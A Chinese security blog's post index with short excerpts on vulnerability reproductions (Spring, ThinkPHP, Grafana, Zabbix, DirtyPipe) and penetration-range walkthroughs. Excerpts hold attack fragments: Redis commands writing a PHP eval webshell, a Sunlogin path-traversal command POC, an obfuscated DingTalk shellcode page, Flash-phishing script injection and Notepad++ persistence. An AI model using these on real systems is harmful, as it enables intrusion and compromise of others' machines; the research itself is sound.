- 博客(42)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 Spring Cloud Function Spel表达式注入
Spring Cloud Function Spel表达式注入漏洞概述Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3 <= 版本 <= 3.2.2( commit dc5128b 之前)存在SpEL表达式执行导致的RCE。环境搭建在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。选择Spring
2022-04-05 00:50:04
6128
原创 Spring Framework RCE(CVE-2022-22965)
Spring Framework RCE(CVE-2022-22965)利用环境war包https://github.com/fengguangbin/spring-rce-wardocker环境https://github.com/lunasec-io/Spring4Shell-POChttps://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965在线环境http://vulfocus.io漏洞原理
2022-04-02 13:22:25
6076
原创 Javasec-RMI
RMIRMI(Remote Method Invocation)即Java远程方法调用,RMI用于构建分布式应用程序,RMI实现了Java程序之间跨JVM的远程通信。让某个Java虚拟机上的对象调⽤另⼀个Java虚拟机中对象上的⽅法。RMI结构RMI底层通讯采用了Stub(运行在客户端)和Skeleton(运行在服务端)机制,RMI调用远程方法的大致如下:RMI客户端在调用远程方法时会先创建Stub(sun.rmi.registry.RegistryImpl_Stub)。Stub会将Remot
2022-03-22 20:15:05
520
原创 Java agent学习
介绍JDK1.5开始,Java新增了Instrumentation(Java Agent API)和JVMTI(JVM Tool Interface)功能,允许JVM在加载某个class文件之前对其字节码进行修改,同时也支持对已加载的class(类字节码)进行重新加载(Retransform)。利用Java Agent这一特性衍生出了APM(Application Performance Management,应用性能管理)、RASP(Runtime application self-protectio
2022-03-18 10:06:03
1172
原创 汽车安全测试学习
汽车安全测试CANcontroller area network - 汽车所有/某些 部件之间进行通信的中枢CAN流量是通过UDP而不是TCP进行传输的OBD要访问汽车的CAN总线,您必须能够访问驾驶室诊断端口。虽然当前的诊断标准和端口有数百种之多,但如今OBD-II已经成为了事实标准,几乎所有汽车都使用这种诊断端口。实际上,汽车修理工诊断汽车故障时,使用的就是它。通过OBD可以直接访问CAN,并且是最直接的方式。另外,OBD-II也很容易找到:通常位于前排乘客或驾驶员座位附近的某个地方,而且不需
2022-03-14 08:50:57
3982
1
原创 SpEL表达式注入漏洞学习
SpEL表达式注入漏洞前言因为前端时间的spring gateway rce正是由此导致的所以来学习一下介绍Spring Expression Language(简称SpEL)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于统一EL,但提供了额外的功能,是方法调用和基本的字符串模板了同时SpEL是API接口的形式因为创建的,所以允许将其集成到其他应用程序和框架中。环境搭建https://github.com/LandGrey/SpringBootVulExploit/tree
2022-03-09 10:57:25
3345
原创 漏洞扫描器学习
工作原理漏洞扫描器向目标计算机发送数据包,然后根据对方反馈的信息来判断对方的操作系统类型、开发端口、提供的服务等敏感信息。端口扫描原理:端口扫描的原理其实非常简单,简单的利用操作系统提供的connect()系统调用(有各种协议),与目标计算机的端口进行连接。如果端口处于侦听状态,那么connect()能够成功,否则,这个端口是不能用的,就是没有提供服务。漏洞扫描原理检测扫描目标主机中可能大量已知的漏洞,如果发现潜在漏洞可能,就报告扫描者。这种扫描器的威胁更大,因为黑客可以直接利用扫描结果进行
2022-03-08 19:32:19
5844
原创 DirtyPipe(脏管道)提权
DirtyPipe提权CVE-2022-0847漏洞详情新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特权本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
2022-03-08 17:38:15
7073
2
原创 Spring Cloud Gateway rce
Spring Cloud Gateway rcecve-2022-22947漏洞描述:Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。也是codeql发现的漏洞影响:3.1.03.0.0至3.0.63.0.0之前的版本复现漏洞首先,发送以下请求以添加包含恶意SpEL 表达式的路由器:POST /actuat
2022-03-07 20:02:20
7059
1
原创 php disable_function绕过
bypass disable_functionsdisable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。要进行添加的话在php.ini中添加即可,每个函数之间使用逗号隔开。配置打开php.ini,搜索disable_function,添加如下函数eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o
2022-03-03 20:15:01
3827
原创 ThinkPHP v6.0.x反序列化漏洞复现与分析
thinkPHP v6.0.0-6.0.3反序列化漏洞复现与分析环境搭建初始环境,需要注意的是,新版v6基于PHP7.1+开发php-7.2.9ThinkPHP v6.0.3使用composer进行安装composer create-project topthink/think=6.0.3 tp6.0⚠️坑点,截止到2021/09/16 ,默认核心安装的为framework=v6.0.9 think-orm=2.0.44 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请
2022-03-02 18:38:47
11030
原创 Grafana 任意文件读取漏洞复现分析
Grafana 任意文件读取漏洞复现分析CVE-2021-437980x01 前言概述Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。影响范围Grafana 8.0.0-beta1 - 8.3.0安全版本Grafana >= 8.3.1 Grafana >= 8.2.7 Grafana >= 8.1.8 Grafana >= 8.0.70x02 环境搭建do
2022-03-02 13:51:26
3137
原创 thinkphp5.1.x反序列化漏洞复现与分析
thinkphp5.1.x反序列化漏洞复现与分析环境搭建安装compoerhttps://install.phpcomposer.com/composer.phar放在php目录下,在 PHP 安装目录下新建一个 composer.bat 文件,并将下列代码保存到此文件中@php "%~dp0composer.phar" %*进入web根目录进行安装composer create-project topthink/think=5.1.35 tp5.1访问http://localhos
2022-03-02 09:32:05
3756
原创 向日葵RCE后续利用之本地提权
根据玄武实验室的文章https://github.com/Ryze-T/CNVD-2022-10270-LPE找到目标日志文件cd /d c:/dir /S sunlogin_service*向日葵日志文件sunlogin_service.20220226-171345.log复现安装.NET 4https://www.microsoft.com/zh-cn/download/details.aspx?id=17718在运行,发现需要指定路径路径,而我在win7下目录为C:
2022-02-27 10:59:53
1318
原创 yso之CC1链
前言Commons Collections的利用链也被称为cc链,在学习反序列化漏洞必不可少的一个部分。Apache Commons Collections是Java中应用广泛的一个库,包括Weblogic、JBoss、WebSphere、Jenkins等知名大型Java应用都使用了这个库。Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,
2022-02-26 12:41:22
1028
原创 Redis主从复制
Redis主从复制未授权访问版本3.2之前都是绑定0.0.0.0:6379所以暴露在公网3.2之后绑定127.0.0.1相对安全,但是还是无密码可以利用ssrf进行利用(gopher,dict)利用注意flushall危险操作,会清空所有缓存数据。通用写入webshellflushallset x '<?php eval($_GET["Q"]);?>'config set dir /var/www/html/uploadconfig set dbfilename tes
2022-02-24 19:21:53
1832
原创 Zabbix-CVE-2022-23131复现
Zabbix-CVE-2022-231310x01漏洞介绍Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。攻击条件限制:需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默
2022-02-24 10:43:32
2294
2
原创 向日葵远控rce复现
向日葵POCping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami端口扫描首先扫描端口获取sid可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras每次访问不一样,但是都可以用dmP
2022-02-24 09:23:48
2987
原创 dingtalk-RCE复现
dingtalk-RCE漏洞版本:6.3.5触发方式:dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=truehtml,改shellcode变量即可<html><body> <h1> test </h1> <script> var _0x1b17=['KELCi8OxLg==','ZE/CpWvCpDkcPA==
2022-02-24 09:20:43
1490
原创 微信小程序渗透学习
微信小程序小程序测试流程分为两个方面,解包可以挖掘信息泄露问题、隐藏的接口,抓包可以测试一些逻辑漏洞、API安全问题。两者结合起来就可以边调试边进行测试,更方便于安全测试。搜索目标小程序目标搜索不能仅仅局限于主体单位,支撑单位、供应商、全资子公司等都可能是入口点,所以小程序当然也不能放过它们。小程序主体信息确认查看小程序账号主体信息,否则打偏了花费了时间不说,还可能有法律风险。点击小程序,点更多资料就能看到小程序相关信息小程序包获取PC端首先在微信中搜索到小程序,并打开简单浏览然后在自己
2022-02-22 19:39:00
1304
原创 权限维持之notepad++
notepad++插件Notepad++ 插件可用于扩展 Notepad++ 的功能。默认情况下,用户可以在 Notepad++ 中下载已批准的插件列表,但也允许自定义插件,无需任何验证,从而为开发人员提供扩展文本编辑器使用的灵活性。插件具有 DLL 文件的形式,并存储在以下路径中:%PROGRAMFILES%\Notepad++\plugins应该注意的是,为了加载插件,文件夹和 DLL 需要具有相同的名称。如:对于红队操作员来说,不需要从头开始编写恶意插件,当在 notepad++ 中输
2022-02-22 19:35:21
1114
原创 Flash钓鱼
Flash钓鱼首先将写好的flash.js放在自己的服务器上var s1 = document.createElement('script');s1.setAttribute('type','text/javascript');s1.setAttribute('src','//cdn.bootcdn.net/ajax/libs/jquery/2.0.0/jquery.min.js');var head = document.getElementsByTagName('head')[0];head
2022-02-22 19:28:54
26061
原创 APP安全学习
全局扫描mobsf安装要求Install GitInstall Python 3.8-3.9Install JDK 8+Install Microsoft Visual C++ Build ToolsInstall OpenSSL (non-light)Download & Install wkhtmltopdf as per the wiki instructionsAdd the folder that contains wkhtmltopdf binary to envi.
2022-02-22 19:14:33
1334
原创 yso之URLDNS链
前言文章首发于tools:yso之URLDNS链Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久保存一个对象,这过程叫做序列化。序列化对象会通过ObjectOutputStream的writeObject方法将一个对象写入到文件中。而反序列化是使用了readObject 方法进行读取并还原成在序列化前的一个类。这一步骤并没有什么安全问题,但是如果反序列化的数据是可控的情况下,那么我
2022-01-24 21:24:04
2415
原创 源码泄露到getshell(2)
源码泄露到getshell(2)前言文章首发于先知社区:源码泄露到getshell(2)文章所述漏洞已经提交至漏洞平台,且所有恶意操作均已复原源码泄露http://www.xxx.com.cn/www.zip老规矩拿到源码先通关关键词找敏感信息keypwdpasswdpassword找到了半天居然找不到一个有效的密码最后在robots.txt中看到CMS的信息-EmpireCMS查询知道是开源cms后,直接百度查询数据表结构知道了管理员记录表为phome_enewsuse
2022-01-24 21:20:49
1983
原创 ClassCMS2.4代码审计
ClassCMS2.4代码审计前言首发于先知社区:ClassCMS2.4代码审计此次漏洞分析皆在本地测试,且漏洞已经提交至cnvd平台漏洞url需要后台管理员权限http:///ClassCMS/admin666?do=shop:downloadClass&ajax=1漏洞点在后台的 管理->应用管理->应用下载处存在任意远程文件下载先放掉第一个请求包POST /admin666?do=shop:index&ajax=1&action=fileu
2022-01-24 21:19:49
2133
2
原创 记一次从源码泄露到getshell
记一次从源码泄露到getshell前言:首发于先知社区:记一次从源码泄露到getshell此次渗透中的所有修改已经复原,且漏洞已经提交至cnvd平台源码泄露在一个月黑风高的夜晚,闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描在查看备份文件扫描结果时,看到了宝贝二话不说,访问下载得到源码!可以在注释信息处发现dedecms的痕迹敏感信息泄露获得源码的第一步当然是获取敏感信息先尝试全局搜索(crtl+shift+f)关键词keypwdpasswdpassword
2022-01-24 21:18:05
2401
原创 渗透靶场--vulnstack-红队评估实战(5)
vulnstack-红队评估实战(5)环境配置win7sun\heart 123.com sun\Administrator dc123.com内网:192.168.138.136 外网:192.168.154.140启动phpstudy2008sun\admin 2021.com192.168.138.138kali192.168.154.1291.对外网主机进行信息搜集开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22搜索
2021-07-20 11:15:59
920
原创 渗透靶场--vulnstack-红队评估实战(4)
vulnstack-红队评估实战(4)环境配置web服务器ubuntu:ubuntu内网192.168.183.131外网192.168.154.137web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613sudo suubuntucd /home/ubuntu/Desktop/vulhub/struts2/s2-045docker-compose up域成员机器douser:Dotest123192.168.183.128域控
2021-07-20 11:15:30
811
原创 渗透靶场--vulnstack-红队评估实战(3)
vulnstack-红队评估实战(3)环境配置攻击者:kali192.168.154.129web192.168.154.135 192.168.93.100pc 192.168.93.30win2008 192.168.93.20win2012 192.168.93.10web1-ubantu 192.168.93.1201.外网主机信息搜集nmap扫描[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vGg14jbu-16267
2021-07-20 11:13:14
1209
原创 渗透靶场--vulnstack-红队评估实战(2)
vulnstack-红队评估实战(2)环境配置攻击者:kali192.168.154.129windows192.168.154.1靶场:WEB:对外边界服务器10.10.10.80192.168.154.80PC:域成员192.168.154.20110.10.10.201DC:域控10.10.10.101.外网主机信息搜集nmap 扫描web服务器端口发现开放了80和700180无内容,7001weblogic版本为10.3.6.0直接上工具获得权限代
2021-07-20 11:12:26
1724
1
原创 渗透靶场--HackathonCTF 2
HackathonCTF 21.首先nmap扫描获得ip2.扫描全端口并记录信息nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.1413.可以看到ftp上匿名用户可以得到flag1.txt和word.dir4.那么接下来就是利用这个字典爆破ssh5.还有一个80端口,目录扫描得到一个happy目录,查看源代码获取到用户名6.hydra ssh爆破hydra -l hackathonll -P word.dir
2021-07-20 11:09:24
640
3
原创 渗透靶场--DC1
DC1攻击机ip:192.168.1.164靶机ip:192.168.1.163目标:获取靶机上的5个flag1.内网渗透,先利用namp扫描整个网段目标机为192.168.1.1632.继续nmap嗅探端口信息,。开放了22/80/111/56771端口3.那就访问80端口是一个网站CMS为Drupal4.使用dirseach扫描网站目录,扫出了一个robots.txt## robots.txt## This file is to prevent the crawli
2021-07-20 11:08:18
811
原创 Python中Socket编程
目录Python中Socket编程 1一、Socket概述 1二、python中socket模块使用 1三、socket之聊天室 3四、socket之端口探测 7五、scapy之tcp端口探测 11Python中Socket编程一、Socket概述socket通常也称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,应用程序通常通过"套接字"向网络发出请求或者应答网络请求。socket即是一种特殊的文件,socket函数就是对其进行的操作(读/写IO、打
2021-01-08 16:13:06
3295
3
原创 python实现渗透工具(多线程篇)
网络安全防护_多线程多线程什么是线程线程(Thread)被包涵在进程之中,是进程中的实际运作单位。一个线程可以创建和撤消另一个线程,同一进程中的多个线程之间可以并发执行。为什么要使用多线程使用多线程来实现多任务并发执行比使用多进程的效率高。python多线程实现简单使用import threadingimport timedef run(n): print("task", n) time.sleep(1) print('2s')
2021-01-03 23:39:06
1191
原创 ctfshow-文件包含
文件包含PHP包含函数:include():如果包含文件未找到会显示警告,脚本继续执行;include_once():包含过的文件不再包含,包含文件未找到会显示警告,脚本继续执行;require():包含文件未找到会产生致命错误,脚本终止;require_once():包含过的文件不再包含,包含文件未找到会产生致命错误,脚本终止。敏感文件Linux/Unix系统/etc/passwd
2020-12-25 23:54:28
2867
1
原创 ctfshow-命令执行
命令执行反引号``反引号``即命令替换是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出单引号,双引号适用条件:过滤了字符串放在shell命令中,绕过正则匹配且不影响原意空格绕过> < <> 重定向符%09(需要php环境)${IFS}$IFS$9{cat,flag.php} //用逗号实现了空格功能%20%09读文件绕过(cat绕过)适用条件:过滤了cat1)more:一页一页的显示档案内容(2)less:与 mor
2020-12-19 13:08:46
4264
2
原创 ctfshow(web入门1-28)
极客大挑战Crypto二战情报员刘壮考点:摩斯密码通过[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tp0dMAf1-1605781237222)(C:\Users\J\AppData\Roaming\Typora\typora-user-images\image-20201021223545227.png)]1.简介中直接看出是摩斯密码2.通过在线网站直接解密得到flag铠甲与萨满考点:凯撒密码[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直
2020-12-19 13:06:36
1771
2
原创 2020第十一届极客大挑战——Geek Challenge(部分解)
Crypto二战情报员刘壮考点:摩斯密码通过1.简介中直接看出是摩斯密码2.通过在线网站直接解密得到flag铠甲与萨满考点:凯撒密码1.通过题目和提示知道是凯撒密码2.通过CrakTools直接解密找到SYC即可成都养猪二厂考点:猪圈密码,栅栏密码1.[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w1bVRQgi-1608350560768)(http://image.liangyueliangyue.top/writeup-image/image
2020-12-19 12:04:00
24306
1
原创 web入门-信息搜集
信息搜集源码隐藏最最简单的题目是直接将flag放入注释中,只要查看源代码就能得到flag注释通常在后端代码块中编写的,它是一个不可执行的部分,不会显示在输出结果中,在程序运行过程中会被解释器直接忽略。一般的注释HTMLPHP //单行注释,/* */多行注释但是有些网站会通过脚本禁止掉页面右键的使用例(JAVASCRIPT)function click(e) {if (document.all) {if (event.button==2||event.button
2020-12-19 12:01:52
400
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人